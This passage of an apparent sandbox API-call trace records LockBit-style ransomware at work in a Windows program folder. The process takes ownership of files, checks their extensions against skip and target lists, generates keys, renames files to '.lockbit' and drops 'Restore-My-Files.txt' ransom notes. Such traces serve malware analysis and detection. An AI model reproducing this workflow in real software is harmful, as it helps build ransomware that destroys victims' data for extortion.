(hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.445] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.445] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.446] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.446] RtlFreeAnsiString (AnsiString="\\") [0081.446] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.446] malloc (_Size=0x200) returned 0x77d800 [0081.446] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.446] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.446] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.446] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.447] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.447] CloseHandle (hObject=0x3b4) returned 1 [0081.447] free (_Block=0x77d800) [0081.447] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.447] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.447] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.447] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3130) returned 1 [0081.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.448] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.677] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.677] malloc (_Size=0xe8) returned 0x77d800 [0081.677] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xe8, FileInformationClass=0xa) returned 0xc0000008 [0081.677] free (_Block=0x77d800) [0081.677] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.677] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.677] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.678] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ba24f8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ba24f8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0081.678] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.678] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.678] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0081.678] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.678] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.678] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.679] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.679] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.679] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.679] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.679] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.679] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.679] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.679] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.679] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.679] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.680] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0081.680] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0081.680] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0081.680] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.680] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.680] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0081.680] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.680] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.680] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png") returned=".png" [0081.680] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.680] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.680] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.680] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.681] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.681] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.681] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.681] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.681] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.681] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.681] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.681] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.681] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.681] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.681] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.681] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.681] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.681] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png.lockbit") returned 100 [0081.681] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.683] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.683] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.683] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.683] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.683] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.683] RtlFreeAnsiString (AnsiString="\\") [0081.684] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.684] malloc (_Size=0x200) returned 0x77d800 [0081.684] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.684] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.684] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.684] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.684] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.685] CloseHandle (hObject=0x3b4) returned 1 [0081.685] free (_Block=0x77d800) [0081.685] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.685] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.685] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.685] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5025) returned 1 [0081.685] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.686] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.695] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.695] malloc (_Size=0xde) returned 0x77d800 [0081.698] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xde, FileInformationClass=0xa) returned 0xc0000008 [0081.698] free (_Block=0x77d800) [0081.698] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.698] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.698] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.698] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b300e1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b300e1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0081.698] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.698] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.698] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0081.698] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.698] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.698] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.698] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.698] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.698] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.698] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.699] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.699] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.699] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.699] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.699] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.700] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.700] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.700] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.700] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.700] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.700] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.700] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0081.700] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0081.700] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0081.700] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.700] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.700] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0081.700] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.701] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.701] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png") returned=".png" [0081.701] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.701] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.701] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.701] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.701] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.702] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.702] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.702] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.702] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.702] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.702] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.702] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png.lockbit") returned 106 [0081.702] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.705] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.705] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.705] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.706] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.706] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.706] RtlFreeAnsiString (AnsiString="\\") [0081.706] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.706] malloc (_Size=0x200) returned 0x77d800 [0081.706] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.706] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.706] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, 